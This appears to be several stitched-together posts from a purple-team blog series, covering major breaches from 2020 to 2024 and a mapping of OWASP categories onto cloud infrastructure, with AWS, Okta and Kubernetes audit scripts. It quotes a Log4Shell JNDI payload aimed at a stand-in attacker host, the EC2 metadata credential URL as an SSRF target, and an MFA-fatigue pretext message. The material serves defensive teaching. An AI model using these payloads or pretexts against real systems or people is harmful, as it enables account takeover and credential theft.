kubectl get pods -A -o json | \
  jq -r '.items[].spec.containers[].image' | \
  sort -u
# Then scan each image: trivy image --severity CRITICAL <image>

The fix was patching — upgrading Log4j to 2.17.0+. The mitigation was log4j2.formatMsgNoLookups=true or removing the JndiLookup class from the classpath. Neither mitigation addressed the root cause of having an outdated component with critical CVE.


September 2022: Uber — MFA Fatigue Meets Hardcoded Credentials

OWASP: A07 (Identification and Authentication Failures), A02 (Cryptographic Failures)

The Uber breach is a clean illustration of attack chaining: one authentication failure enables discovery of a second authentication failure.

Minute-by-minute anatomy:

  1. Attacker purchases Uber contractor credentials on a criminal marketplace (or phishes them directly)
  2. Contractor has MFA enrolled — Duo push notifications
  3. Attacker initiates login repeatedly, triggering Duo push notifications to contractor’s phone
  4. Contractor rejects 3–4 push notifications
  5. Attacker sends WhatsApp message to contractor’s phone: “Hi, this is IT support. We’re having an issue with your account. Please accept the next Duo notification.”
  6. Contractor accepts
  7. Attacker is in

From inside the Uber network, the attacker found a network share accessible to contractors. On that share: a PowerShell script. In that script: hardcoded admin credentials for Thycotic, Uber’s privileged access management (PAM) system.

With Thycotic admin access, the attacker retrieved credentials for: AWS, GCP, GSuite, VMware, Slack, HackerOne. Full internal access.

The two failures:
– A07: Push-notification MFA that can be defeated by social engineering + fatigue
– A02: Admin credentials in a plaintext PowerShell script on a network share

# Detect MFA fatigue attempts in Okta logs (if Okta is the IdP)
# Query: multiple MFA push rejections followed by acceptance within short window
# In Okta System Log API:
curl -H "Authorization: SSWS ${OKTA_API_TOKEN}" \
  "https://your-org.okta.com/api/v1/logs?filter=eventType+eq+\"user.authentication.auth_via_mfa\"&since=2024-01-01T00:00:00Z" | \
  jq '[.[] | select(.outcome.result == "FAILURE")] | group_by(.actor.id) | map({user: .[0].actor.displayName, failures: length}) | sort_by(.failures) | reverse | .[0:10]'

The structural fix for MFA fatigue is not user training. It is replacing push-notification MFA with phishing-resistant MFA: FIDO2 hardware keys (YubiKey) or passkeys. A hardware key requires physical presence — a WhatsApp message cannot convince a hardware key to authenticate.


January 2023: CircleCI — Session Token Theft and Secret Exfiltration

OWASP: A07 (Authentication Failures), A08 (Software and Data Integrity Failures)

CircleCI disclosed in January 2023 that an attacker had accessed customer data — specifically, environment variables, tokens, and keys stored by customers in CircleCI’s secret storage.

The attack chain:

  1. Malware on a CircleCI engineer’s laptop stole a 2FA-backed SSO session token
  2. The session token was valid and not yet expired — no MFA re-challenge for the session
  3. Attacker used the session token to access CircleCI’s internal systems
  4. From internal systems, attacker accessed the production database containing encrypted customer secrets
  5. The encryption keys were also accessible — attacker obtained both

The attack did not break encryption. It circumvented encryption by accessing the keys through internal systems that the compromised session token could reach.

What customers stored in CircleCI that was exposed:
– AWS IAM access keys and secret keys
– GitHub tokens
– DockerHub credentials
– SSH private keys
– API tokens for third-party services

The scale: CircleCI could not enumerate which customer secrets were accessed — they notified all customers with environment variables stored in the system.

# After a CI/CD platform breach: rotate all credentials that were stored there
# Start with AWS credentials — find and disable exposed access keys

# List all IAM access keys
aws iam list-users --query 'Users[].UserName' --output text | \
  tr '\t' '\n' | \
  while read user; do
    aws iam list-access-keys --user-name "$user" \
      --query "AccessKeyMetadata[].{User:'$user',Key:AccessKeyId,Status:Status,Created:CreateDate}" \
      --output table
  done

# Disable a specific access key
aws iam update-access-key \
  --access-key-id AKIAIOSFODNN7EXAMPLE \
  --status Inactive \
  --user-name affected-user

The structural lesson: Secrets stored in a CI/CD platform are only as secure as that platform’s internal access controls and the endpoint security of the engineers who access it. The alternative — short-lived credentials via OIDC workload identity — means no long-lived secrets exist to exfiltrate.


October 2023: Okta — Support System Compromise

OWASP: A07 (Identification and Authentication Failures)

Okta is the identity provider for thousands of organizations. An attacker who compromises Okta’s support system gains access to customer identity configurations.

In October 2023, Okta disclosed that an attacker had accessed their customer support case management system using stolen credentials. The attacker used that access to view HTTP Archive (HAR) files that customers had uploaded as part of support tickets. HAR files capture all network traffic in a browser session — including session cookies and authentication tokens.

What the attacker retrieved from HAR files:
– Active session tokens for customer Okta admin accounts
– Enough data to authenticate as Okta admins for affected customers

Confirmed affected customers (that disclosed publicly):
– 1Password (detected and contained quickly)
– Cloudflare
– BeyondTrust

The dwell time: Okta’s later forensic analysis revealed the attacker had access for two weeks before the disclosure.

# Check Okta System Log for suspicious admin activity
# Look for admin authentications from unusual IPs or at unusual times
curl -H "Authorization: SSWS ${OKTA_API_TOKEN}" \
  "https://your-org.okta.com/api/v1/logs?filter=eventType+eq+\"user.session.start\"+and+actor.type+eq+\"User\"&since=$(date -d '30 days ago' --iso-8601=seconds)" | \
  jq '.[] | {user: .actor.displayName, ip: .client.ipAddress, time: .published, result: .outcome.result}'

The structural implication for organizations using Okta: Tier-0 accounts (Okta administrators) need break-glass procedures and hardware key MFA — not because Okta itself will be compromised, but because a support system compromise at a SaaS provider can expose session context that reaches those accounts.


April 2024: XZ Utils — Two Years of Social Engineering

OWASP: A08 (Software and Data Integrity Failures), A06 (Vulnerable and Outdated Components)

XZ Utils (CVE-2024-3094) is the most sophisticated supply chain attack to date in the open-source ecosystem. The attacker operated under the pseudonym “Jia Tan” and spent approximately two years building trust in the XZ Utils project before inserting a backdoor.

The timeline:

2022 Q4 — Jia Tan begins contributing to XZ Utils with legitimate, high-quality patches
2023 Q1 — Jia Tan increases contribution frequency; original maintainer shows signs of burnout
2023 Q2 — Jia Tan gains commit access to XZ Utils
2024 Q1 — Jia Tan releases XZ Utils 5.6.0 and 5.6.1 with backdoor in release tarball
          (NOT in git repository — only in the distributed tarball)
2024 Q2 — Andres Freund (Microsoft engineer, incidentally) notices SSH is 500ms slower
          on systems with xz 5.6.x; investigates; finds backdoor
          Reported April 1, 2024; CVE assigned April 2, 2024

The backdoor’s target: The backdoor patched sshd via systemd on glibc-based Linux systems. On affected systems, it would have given the attacker remote code execution on SSH servers — specifically, authentication bypass for a specific RSA key pair held by the attacker.

What was 1–2 weeks from shipping broadly:
– Fedora 40 (test release only — caught before stable)
– Debian unstable/testing
– openSUSE Tumbleweed

The detection insight: The backdoor was in the release tarball, not the git repository. git clone and git diff would not have shown it. The only detection was comparing the distributed tarball’s build output against a reproducible build from source — or noticing the anomalous SSH latency.

# Check if your systems have the affected xz version
xz --version
# Vulnerable: 5.6.0 or 5.6.1

# Check on RPM-based systems
rpm -q xz

# Check on Debian/Ubuntu systems
dpkg -l xz-utils

# Check for sshd linked against compromised libzma
ldd $(which sshd) | grep liblzma
# If libzma is present and xz is 5.6.0 or 5.6.1, the system was exposed

The Three Root Causes: A Framework for Your Exercise Backlog

After analyzing these six incidents (and the broader 2020–2025 breach landscape), three root causes account for virtually every major cloud infrastructure compromise:

┌─────────────────────────────────────────────────────────────────┐
│                                                                 │
│  ROOT CAUSE 1: IDENTITY                                         │
│  Attacker obtains valid credentials — stolen, phished,          │
│  or socially engineered. MFA does not stop it if MFA            │
│  itself can be bypassed (fatigue, SIM swap, token theft).       │
│  Incidents: Uber, Okta, CircleCI (initial vector)               │
│                                                                 │
│  ROOT CAUSE 2: SUPPLY CHAIN                                     │
│  Attacker compromises something you trust: a vendor's           │
│  software, a build pipeline, an open-source dependency.         │
│  The artifact you install is legitimate — and malicious.        │
│  Incidents: SolarWinds, XZ Utils, Log4Shell (component)         │
│                                                                 │
│  ROOT CAUSE 3: MISCONFIGURATION                                  │
│  An access control is wrong. A resource is exposed that         │
│  shouldn't be. An encryption requirement is missing.            │
│  No attacker capability required — just knowledge of the gap.   │
│  Incidents: Capital One (S3 + IAM), public buckets broadly      │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘

Your purple team exercise backlog should cover all three. The remaining episodes in this series address each one:

  • Identity: EP05 (MFA fatigue), EP10 (cross-account lateral movement)
  • Supply chain: EP06 (CI/CD secrets), EP09 (SolarWinds to XZ Utils)
  • Misconfiguration: EP04 (broken access control in AWS), EP07 (SSRF/IMDS), EP08 (container escape)

Run This in Your Own Environment: Breach Scenario Self-Assessment

Before starting the technique-specific episodes, run this self-assessment to identify which breach scenario your environment is most exposed to:

#!/bin/bash
# Purple Team EP03 — Breach Exposure Self-Assessment

echo "=== IDENTITY EXPOSURE ==="
echo "--- Users with console access and no MFA ---"
aws iam generate-credential-report > /dev/null 2>&1 && sleep 3
aws iam get-credential-report --query 'Content' --output text | \
  base64 -d | awk -F',' 'NR>1 && $4=="true" && $8=="false" {print "  NO MFA: " $1}'

echo ""
echo "=== SUPPLY CHAIN EXPOSURE ==="
echo "--- Lambda functions with old runtimes (EOL = higher CVE exposure) ---"
aws lambda list-functions \
  --query 'Functions[?Runtime==`python3.8` || Runtime==`nodejs14.x` || Runtime==`java8`].{Name:FunctionName,Runtime:Runtime}' \
  --output table

echo ""
echo "=== MISCONFIGURATION EXPOSURE ==="
echo "--- S3 buckets without account-level public access block ---"
ACCOUNT=$(aws sts get-caller-identity --query Account --output text)
PAB=$(aws s3control get-public-access-block --account-id "$ACCOUNT" 2>/dev/null)
if [ -z "$PAB" ]; then
  echo "  CRITICAL: Account-level S3 public access block is NOT set"
else
  echo "$PAB" | jq '{BlockPublicAcls, IgnorePublicAcls, BlockPublicPolicy, RestrictPublicBuckets}'
fi

echo ""
echo "--- EC2 instances with IMDSv1 enabled (SSRF risk) ---"
aws ec2 describe-instances \
  --query 'Reservations[].Instances[?MetadataOptions.HttpTokens!=`required`].{ID:InstanceId,State:State.Name}' \
  --output table

⚠ Common Mistakes When Using Breach History as a Training Resource

Assuming “we’re not SolarWinds” means supply chain doesn’t apply. You don’t have to be a software vendor. Your GitHub Actions workflows pull third-party actions. Your Dockerfiles pull base images. Your Lambda functions install pip packages. Every external artifact is a supply chain dependency.

Treating Log4Shell as “old news.” The vulnerability was disclosed in 2021. Organizations are still finding Log4j in unexpected places in 2024 — embedded in monitoring agents, database drivers, and vendor-supplied applications where the dependency tree was never audited.

Responding to Uber/Okta by mandating security awareness training. The Uber breach happened to an experienced contractor who made one decision under social pressure. The structural fix is hardware MFA that cannot be fatigue-attacked — not a training module that adds friction and gets clicked through.

Not correlating your own logs against breach indicators. Every breach in this episode produced specific, searchable indicators: specific CloudTrail event patterns, specific process behaviors, specific network anomalies. If you have historical logs, you can run indicators of compromise against them to see whether your environment would have surfaced those indicators.


Quick Reference

Breach Year OWASP Primary Root Cause Structural Fix
SolarWinds 2020 A08 Supply chain — build pipeline compromise Reproducible builds, build system isolation
Log4Shell 2021 A03, A06 Injection + vulnerable component Patch + dependency inventory
Uber 2022 A07, A02 Identity — MFA fatigue + hardcoded creds Hardware MFA + no hardcoded secrets
CircleCI 2023 A07, A08 Identity — session token theft → CI secret theft OIDC short-lived creds instead of stored secrets
Okta 2023 A07 Identity — support system compromise → token theft Hardware MFA for tier-0, session token rotation
XZ Utils 2024 A08, A06 Supply chain — social engineering → maintainer trust Reproducible builds, artifact signing, SLSA

Key Takeaways

  • Cloud security breaches from 2020 to 2025 cluster into three root causes: identity compromise, supply chain compromise, and misconfiguration — every major incident is one or more of these
  • SolarWinds and XZ Utils are the same attack class: compromise the build pipeline and sign the result with a trusted key
  • Uber demonstrates that MFA does not prevent breach when the MFA mechanism is push-notification — fatigue + social engineering defeats it
  • CircleCI demonstrates that long-lived secrets stored in a CI/CD platform are only as secure as that platform — OIDC short-lived credentials eliminate the exposure
  • Log4Shell demonstrates that vulnerable transitive dependencies are invisible without active dependency scanning — “we didn’t use Log4j” was wrong for thousands of organizations
  • The attack surface does not change: the same three root causes that caused SolarWinds in 2020 caused XZ Utils in 2024
  • Your purple team exercise backlog should include at least one scenario for each of the three root causes

What’s Next

EP04 starts the technique-specific episodes with broken access control in AWS — the most common OWASP A01 manifestation in cloud infrastructure. The exercise scenario: an S3 bucket with 47 million records, public for six months, with no alert ever firing. We simulate it, detect it, and fix the IAM and S3 configuration so it cannot happen in your account. If you want the full context for AWS IAM privilege escalation paths that broken access control enables, the IAM series EP08 covers that attack chain in detail.

Get EP04 in your inbox when it publishes → subscribe at linuxcent.com

OWASP Top 10 Mapped to Cloud Infrastructure: Beyond Web Apps

Reading Time: 11 minutes

What is purple team securityOWASP Top 10 mapped to cloud infrastructureEP03: Cloud security breaches 2020–2025


TL;DR

  • OWASP Top 10 cloud infrastructure mapping shows that every category has a direct cloud-native equivalent — this is not a web-app-only taxonomy
  • A01 Broken Access Control = IAM wildcards, public S3, overly permissive trust policies
  • A07 Authentication Failures = MFA fatigue, session token theft, push-notification abuse
  • A08 Software/Data Integrity = compromised build pipelines, unsigned container images, secrets in CI/CD
  • A10 SSRF = EC2 metadata endpoint abuse, IMDSv1 credential theft (the Capital One attack vector)
  • Every major cloud breach 2020–2025 lands in one of these ten categories — the taxonomy was always infrastructure-applicable

OWASP Mapping: All categories — A01 through A10. This episode is the reference map for the entire series.


The Big Picture

┌─────────────────────────────────────────────────────────────────────┐
│           OWASP TOP 10 → CLOUD INFRASTRUCTURE MAPPING              │
│                                                                     │
│  OWASP (2021)              CLOUD EQUIVALENT          REAL BREACH    │
│  ─────────────────────────────────────────────────────────────────  │
│  A01 Broken Access Ctrl  → IAM wildcards, public S3  Capital One    │
│  A02 Cryptographic Fail  → Plaintext secrets, weak   CircleCI       │
│                            KMS config                               │
│  A03 Injection           → Log4j JNDI, SSRF as       Log4Shell      │
│                            injection variant                        │
│  A04 Insecure Design     → --privileged containers   runc CVEs      │
│                            no seccomp/AppArmor                      │
│  A05 Security Misconfig  → K8s RBAC defaults, open   Multiple       │
│                            etcd ports                               │
│  A06 Vulnerable Comps    → Transitive deps, outdated  XZ Utils      │
│                            base images                              │
│  A07 Auth Failures       → MFA fatigue, stolen        Uber, Okta    │
│                            session tokens                           │
│  A08 SW/Data Integrity   → Unsigned artifacts,        SolarWinds    │
│                            compromised pipelines                    │
│  A09 Logging/Monitoring  → Missing CloudTrail,        Most          │
│                            no workload telemetry                    │
│  A10 SSRF                → EC2 IMDS abuse, metadata  Capital One    │
│                            credential theft                         │
└─────────────────────────────────────────────────────────────────────┘

OWASP Top 10 cloud infrastructure mapping is not a translation exercise — it is a recognition that the same classes of failure that compromise web applications also compromise cloud infrastructure, Kubernetes clusters, and CI/CD pipelines. The language shifts; the attack classes don’t.


Why Engineers Treat OWASP as a Web-App-Only Concern

I kept hearing OWASP Top 10 in web application security reviews. The AppSec team ran it through their checklist. The infrastructure team shrugged — “that’s for the developers.” Then I looked at the actual cloud breaches: Capital One, Uber, CircleCI, SolarWinds. Every one of them mapped to an OWASP category.

The confusion comes from OWASP’s origins. The project started in 2001 focused on web application vulnerabilities. SQL injection, XSS, broken authentication against HTTP endpoints. The cloud and container ecosystem didn’t exist. So the examples stayed web-application-centric even as the underlying failure classes proved universal.

The 2021 OWASP Top 10 update is more abstracted than its predecessors — intentionally. “Broken Access Control” doesn’t say “SQL injection.” It says access control. That applies to every IAM policy that has "Action": "*" where it shouldn’t.

This episode makes the mapping explicit. One OWASP category at a time.


A01: Broken Access Control — IAM Wildcards and Public S3

Web equivalent: A user can access other users’ records by modifying the URL parameter.

Cloud equivalent: An IAM role with "Action": "*" on "Resource": "*". An S3 bucket with public read. A cross-account trust policy that allows any principal in the account, not just a specific role.

Broken access control in cloud infrastructure means the principal can reach a resource it should not be able to reach, because the access control decision was not made or was made incorrectly.

The Capital One breach (2019, disclosed publicly) is the canonical example. A WAF running on EC2 had an IAM role attached. That role had permissions to list and retrieve objects from S3 buckets. SSRF against the WAF reached the EC2 metadata endpoint and retrieved the IAM role credentials. Those credentials then accessed 100 million customer records. The SSRF was A10. The fact that the WAF had access to customer data S3 buckets was A01.

aws s3control get-public-access-block --account-id $(aws sts get-caller-identity --query Account --output text)

# Find buckets that override the account-level block
aws s3api list-buckets --query 'Buckets[].Name' --output text | \
  tr '\t' '\n' | \
  while read bucket; do
    result=$(aws s3api get-public-access-block --bucket "$bucket" 2>/dev/null)
    if echo "$result" | grep -q '"BlockPublicAcls": false'; then
      echo "PUBLIC ACCESS NOT BLOCKED: $bucket"
    fi
  done

A02: Cryptographic Failures — Plaintext Secrets and Weak KMS Config

Web equivalent: Passwords stored as MD5 hashes. Credit card numbers in plaintext in the database.

Cloud equivalent: DATABASE_URL=postgres://user:password@host/db in a .env file committed to a public repository. An S3 bucket with sensitive data where server-side encryption is not enforced. KMS key policies that allow kms:Decrypt to any principal in the account.

Cryptographic failures in the cloud are less about broken algorithms and more about secrets that aren’t secret. The CircleCI breach (January 2023) exposed customer secrets — API tokens, AWS credentials, private keys — that customers had stored in CircleCI’s environment variables. The attacker compromised CircleCI’s infrastructure and exfiltrated those secrets. The cryptographic failure was that secrets were stored in a way that could be exfiltrated when the platform was compromised, rather than being bound to hardware or using short-lived credentials that couldn’t be replayed.

# Check if default EBS encryption is enabled (prevents data at rest failures)
aws ec2 get-ebs-encryption-by-default --region us-east-1

# Check for S3 buckets without default encryption
aws s3api list-buckets --query 'Buckets[].Name' --output text | \
  tr '\t' '\n' | \
  while read bucket; do
    enc=$(aws s3api get-bucket-encryption --bucket "$bucket" 2>/dev/null)
    if [ -z "$enc" ]; then
      echo "NO DEFAULT ENCRYPTION: $bucket"
    fi
  done

A03: Injection — Log4Shell and SSRF as Injection Variants

Web equivalent: SQL injection via unsanitized query parameters.

Cloud equivalent: Log4Shell (CVE-2021-44228) used JNDI lookup injection via HTTP headers to execute arbitrary code in Java applications. SSRF (Server-Side Request Forgery) is an injection variant where attacker-controlled input causes the server to make requests to internal endpoints — including http://169.254.169.254/latest/meta-data/.

Log4Shell (December 2021) demonstrated injection against infrastructure directly. The User-Agent or X-Forwarded-For header contained ${jndi:ldap://attacker.com/exploit}. The logging framework evaluated it. The outcome was remote code execution on any Java application using Log4j 2.x.

The fix was not “validate user input better.” The fix was patching Log4j and — for SSRF — enforcing IMDSv2 (which requires a PUT request with a session token that a naive SSRF cannot produce).

# Check if all EC2 instances require IMDSv2 (prevents SSRF-to-metadata attacks)
aws ec2 describe-instances \
  --query 'Reservations[].Instances[].{ID:InstanceId,IMDSv2:MetadataOptions.HttpTokens}' \
  --output table
# Desired: HttpTokens = "required" for all instances

A04: Insecure Design — Privileged Containers and Missing Runtime Controls

Web equivalent: Application architecture where any authenticated user can reach administrative functions without additional authorization checks.

Cloud equivalent: A container deployed with --privileged: true or allowPrivilegeEscalation: true. A Kubernetes pod without securityContext restricting capabilities. A cluster with no admission controller enforcing pod security standards.

Insecure design in the container context means the security controls that should prevent container breakout were never there. They weren’t removed — they were never designed in. The kernel doesn’t enforce namespace isolation when a container has CAP_SYS_ADMIN. The attacker doesn’t exploit a vulnerability — they use capabilities the design granted.

# Find pods running as root or with privileged flag
kubectl get pods -A -o json | \
  jq -r '.items[] | 
    select(
      (.spec.containers[].securityContext.privileged == true) or
      (.spec.securityContext.runAsNonRoot != true)
    ) | 
    "\(.metadata.namespace)/\(.metadata.name)"'

A05: Security Misconfiguration — Default Kubernetes RBAC and Open Ports

Web equivalent: Default admin credentials not changed. Directory listing enabled on the web server.

Cloud equivalent: kubectl access with cluster-admin ClusterRoleBinding for the default service account. etcd port 2379 accessible from the pod network. AWS security groups with 0.0.0.0/0 on port 22.

Security misconfiguration in Kubernetes is particularly common because the defaults in older Kubernetes versions were not secure-by-default. The default service account in each namespace mounts a service account token that can authenticate to the API server. In clusters without RBAC properly configured, that token can enumerate and modify resources.

# Check what the default service account can do in a namespace
kubectl auth can-i --list --as=system:serviceaccount:default:default -n default

# Find ClusterRoleBindings that bind cluster-admin to non-system subjects
kubectl get clusterrolebindings -o json | \
  jq '.items[] | 
    select(.roleRef.name == "cluster-admin") | 
    {name: .metadata.name, subjects: .subjects}'

A06: Vulnerable and Outdated Components — Transitive Dependencies and Base Images

Web equivalent: An npm package in the dependency tree has a known CVE. The application ships with an outdated version of OpenSSL.

Cloud equivalent: A container base image built from ubuntu:20.04 six months ago, now carrying 47 critical CVEs in installed packages. A Lambda function with a vendored boto3 version that has a known vulnerability. XZ Utils (CVE-2024-3094) — a backdoor inserted into the release tarball of a compression library present in almost every major Linux distribution.

XZ Utils is the defining example of this category in the infrastructure context. The attack was supply chain: two years of social engineering against a maintainer, gaining commit access, inserting a backdoor in the release tarball rather than the source repository (so source audits wouldn’t catch it). The XZ backdoor targeted SSH servers on systems using systemd — it would have given the attacker remote code execution on SSH servers across Fedora, Debian, and Ubuntu before it was caught five weeks before broad distribution release.

# Scan a container image for known CVEs (requires trivy)
trivy image --severity HIGH,CRITICAL your-registry/your-image:tag

# Check Lambda function runtime versions against AWS's deprecation schedule
aws lambda list-functions \
  --query 'Functions[].{Name:FunctionName,Runtime:Runtime,LastModified:LastModified}' \
  --output table

A07: Identification and Authentication Failures — MFA Fatigue and Stolen Tokens

Web equivalent: Session tokens that don’t expire. Password reset links that work indefinitely.

Cloud equivalent: Push-notification MFA that can be exhausted by fatigue attacks. AWS console sessions with 12-hour validity. OAuth tokens stored in browser local storage. SAML assertions that can be replayed.

The Uber breach (September 2022) is the canonical cloud/SaaS example. A contractor’s credentials were obtained via social engineering. The attacker sent repeated Duo push notifications — the contractor rejected them. The attacker then sent a WhatsApp message claiming to be IT support and asking the contractor to accept the next notification. They did. From there, the attacker found a network share containing a PowerShell script with hardcoded admin credentials for Uber’s Thycotic PAM system — full access to the Uber internal network.

The authentication failure was two-layered: push MFA that could be fatigue-attacked, and credentials stored in plaintext in an accessible location.

# List IAM users with console access but no MFA enrolled
aws iam get-account-summary | jq '{AccountMFAEnabled: .SummaryMap.AccountMFAEnabled}'

# Find specific users without MFA
aws iam list-users --query 'Users[].UserName' --output text | \
  tr '\t' '\n' | \
  while read user; do
    mfa=$(aws iam list-mfa-devices --user-name "$user" --query 'MFADevices' --output text)
    if [ -z "$mfa" ]; then
      echo "NO MFA: $user"
    fi
  done

A08: Software and Data Integrity Failures — Compromised Build Pipelines

Web equivalent: Pulling npm packages without verifying checksums. Deploying a build without artifact signing.

Cloud equivalent: A CI/CD pipeline that pulls dependencies from an unauthenticated source. A container image built from a Dockerfile that pulls the latest version of a base image without pinning the digest. A GitHub Actions workflow that references a third-party action at a mutable tag rather than a commit SHA.

SolarWinds (December 2020) is the infrastructure-scale example. The attacker compromised SolarWinds’ build system. The malicious code (SUNBURST) was inserted into the Orion software build process, signed with SolarWinds’ legitimate code signing certificate, and distributed to approximately 18,000 customers via the normal software update mechanism. The artifact was signed. The signature verified. The code was malicious.

The software integrity failure was that the build pipeline itself was not monitored or hardened — an attacker who controlled the build environment could produce signed, trusted artifacts.

# Check GitHub Actions workflows for mutable action references (uses @main or @v1 instead of SHA)
grep -r "uses:" .github/workflows/ | grep -v "@[a-f0-9]\{40\}"

# Verify a container image digest before deployment
docker pull your-registry/your-image:tag
docker inspect your-registry/your-image:tag --format='{{.Id}}'
# Compare this digest to the pinned value in your deployment manifest

A09: Security Logging and Monitoring Failures — What You Can’t See, You Can’t Stop

Web equivalent: No access logs on the web server. No alerting on repeated failed login attempts.

Cloud equivalent: CloudTrail not enabled in all regions. VPC Flow Logs disabled. No GuardDuty. Container workloads with no runtime security monitoring. Lambda functions that log errors to /dev/null.

This is the category that causes the 11-day detection time from EP01. The attacker’s techniques generated events. The events were not collected, or collected but not alerting, or alerting but not investigated.

# Verify CloudTrail is logging in all regions
aws cloudtrail describe-trails --include-shadow-trails true \
  --query 'trailList[?IsMultiRegionTrail==`true`].{Name:Name,Bucket:S3BucketName,Logging:HasCustomEventSelectors}'

# Check which regions have GuardDuty disabled
for region in $(aws ec2 describe-regions --query 'Regions[].RegionName' --output text); do
  status=$(aws guardduty list-detectors --region "$region" --query 'DetectorIds' --output text 2>/dev/null)
  if [ -z "$status" ]; then
    echo "GUARDDUTY DISABLED: $region"
  fi
done

A10: Server-Side Request Forgery (SSRF) — EC2 Metadata and IMDSv1

Web equivalent: An application fetches a URL provided by the user. The user provides http://internal-service/admin.

Cloud equivalent: An application fetches a URL provided by the user (or constructed from user input). The user provides http://169.254.169.254/latest/meta-data/iam/security-credentials/. The response contains temporary IAM credentials valid for the attached instance role.

This is how the Capital One breach worked. A WAF instance had a SSRF vulnerability. The attacker exploited it to reach the EC2 Instance Metadata Service (IMDS). IMDSv1 has no authentication — any HTTP GET to the metadata endpoint from inside the instance returns credentials. Those credentials had overly permissive S3 access (A01). The result was 100 million records exfiltrated.

IMDSv2 requires a PUT request to get a session token before credentials can be retrieved — a SSRF via GET cannot retrieve IMDSv2 credentials. Enforcing IMDSv2 closes the SSRF-to-credentials path.

# Check all EC2 instances for IMDSv1 (HttpTokens != "required" means vulnerable)
aws ec2 describe-instances \
  --query 'Reservations[].Instances[].{
    ID:InstanceId,
    Name:Tags[?Key==`Name`]|[0].Value,
    IMDSv2:MetadataOptions.HttpTokens,
    State:State.Name
  }' \
  --output table

# Enforce IMDSv2 on a specific instance
aws ec2 modify-instance-metadata-options \
  --instance-id i-0123456789abcdef0 \
  --http-tokens required \
  --http-endpoint enabled

The Series Attack Map: Which Episodes Cover Which Categories

OWASP Category Purple Team Episode
A01 Broken Access Control EP04: Broken access control in AWS
A02 Cryptographic Failures EP06 (partial): CI/CD secrets exposure
A03 Injection EP07: SSRF to cloud metadata
A04 Insecure Design EP08: Kubernetes container escape
A05 Security Misconfiguration EP08: Kubernetes container escape
A06 Vulnerable Components EP09: Supply chain attacks
A07 Authentication Failures EP05: MFA fatigue attacks
A08 SW/Data Integrity EP06: CI/CD secrets exposure, EP09: Supply chain
A09 Logging/Monitoring Failures EP11: Detection engineering with eBPF
A10 SSRF EP07: SSRF to cloud metadata

Run This in Your Own Environment: OWASP Coverage Self-Assessment

Run this against your AWS account and record the results as your OWASP A01–A10 baseline before the EP04 exercise:

#!/bin/bash
# Purple Team EP02 — OWASP Cloud Coverage Check
# Run in an account with read-only IAM permissions

echo "=== A01: Broken Access Control ==="
echo "--- S3 public access block status ---"
aws s3control get-public-access-block \
  --account-id $(aws sts get-caller-identity --query Account --output text) 2>/dev/null || \
  echo "WARN: Account-level public access block not set"

echo ""
echo "=== A02: Cryptographic Failures ==="
echo "--- EBS default encryption ---"
aws ec2 get-ebs-encryption-by-default --query 'EbsEncryptionByDefault' --output text

echo ""
echo "=== A05: Security Misconfiguration ==="
echo "--- GuardDuty status in current region ---"
aws guardduty list-detectors --query 'DetectorIds' --output text || echo "DISABLED"

echo ""
echo "=== A07: Authentication Failures ==="
echo "--- IAM users without MFA ---"
aws iam generate-credential-report 2>/dev/null
sleep 3
aws iam get-credential-report --query 'Content' --output text | base64 -d | \
  awk -F',' 'NR>1 && $4=="true" && $8=="false" {print "NO MFA: "$1}'

echo ""
echo "=== A09: Logging/Monitoring Failures ==="
echo "--- CloudTrail multi-region trail ---"
aws cloudtrail describe-trails --query 'trailList[?IsMultiRegionTrail==`true`].Name' --output text || \
  echo "WARN: No multi-region trail"

echo ""
echo "=== A10: SSRF ==="
echo "--- EC2 instances with IMDSv1 enabled ---"
aws ec2 describe-instances \
  --query 'Reservations[].Instances[?MetadataOptions.HttpTokens!=`required`].{ID:InstanceId,IMDS:MetadataOptions.HttpTokens}' \
  --output table

⚠ Common Mistakes When Mapping OWASP to Infrastructure

Treating it as a checklist, not a threat model. OWASP categories are not yes/no checkboxes. “Is broken access control present?” is not a question with a binary answer. The question is: which resources are accessible to which principals, and is that access correct given the intended design?

Ignoring A09 (Logging/Monitoring) until the breach. The first nine categories are about preventing or limiting the attack. A09 is about knowing it happened. Without A09 controls, you will not know you were breached until a third party tells you.

Fixing web-layer controls and ignoring the infrastructure equivalents. An organization that scores well on OWASP in their web application pen test may still have public S3 buckets, IMDSv1 enabled everywhere, and no CloudTrail in us-west-1. The mapping in this episode applies to infrastructure — run it separately from your application security assessments.

Conflating A06 (Vulnerable Components) with just “patch management.” XZ Utils was fully patched in the affected timeframe — the malicious version was the latest release. A06 in the supply chain context is about verifying the integrity of what you install, not just its version number.


Quick Reference

OWASP Cloud Infrastructure Equivalent Detection Tool
A01 IAM wildcards, public S3, broad trust policies AWS Config, CloudTrail
A02 Plaintext secrets in env vars, unencrypted S3 TruffleHog, Macie
A03 SSRF, Log4j JNDI injection WAF logs, CloudTrail IMDS calls
A04 Privileged containers, no seccomp OPA/Gatekeeper, Falco
A05 K8s RBAC defaults, open etcd, open SGs kube-bench, AWS Config
A06 Unpatched base images, transitive CVEs, supply chain Trivy, Grype, SLSA
A07 MFA fatigue, long-lived sessions, stolen tokens GuardDuty, Okta logs
A08 Unsigned images, mutable CI references, build compromise Cosign, SLSA, OIDC
A09 No CloudTrail, no GuardDuty, no runtime telemetry AWS Security Hub
A10 IMDSv1 on EC2, SSRF to internal endpoints VPC Flow Logs, CloudTrail

Key Takeaways

  • OWASP Top 10 is a threat taxonomy — every category has a cloud, Kubernetes, or Linux infrastructure equivalent
  • A01 (Broken Access Control) is the most common cloud failure: IAM wildcards, public S3, and overly broad trust policies
  • A10 (SSRF) is what enabled the Capital One breach — IMDSv1 on EC2 makes any SSRF a credential theft path
  • A08 (Software/Data Integrity) is the SolarWinds attack class — supply chain compromise of the build pipeline itself
  • A09 (Logging/Monitoring) is the category that turns the other nine from “detectable breach” into “11-day dwell time”
  • Fixing A01–A08 without A09 means you improve your controls but still won’t know when they’re bypassed
  • Run the OWASP coverage self-assessment above and record your baseline before starting the episode exercises

What’s Next

EP03 is the breach landscape: six major incidents from December 2020 (SolarWinds) through April 2024 (XZ Utils). Each one maps to the OWASP categories from this episode. The pattern across all six is three root causes — identity, supply chain, misconfiguration — and understanding that pattern tells you where to spend your next purple team exercise. The cloud security breaches from 2020 to 2025 are the empirical record this series is built on.

Get EP03 in your inbox when it publishes → subscribe at linuxcent.com

What Is Purple Team Security: Red + Blue = Better Defense

Reading Time: 8 minutes

What Is Purple Team SecurityOWASP Top 10 mapped to cloud infrastructureCloud security breaches 2020–2025


TL;DR

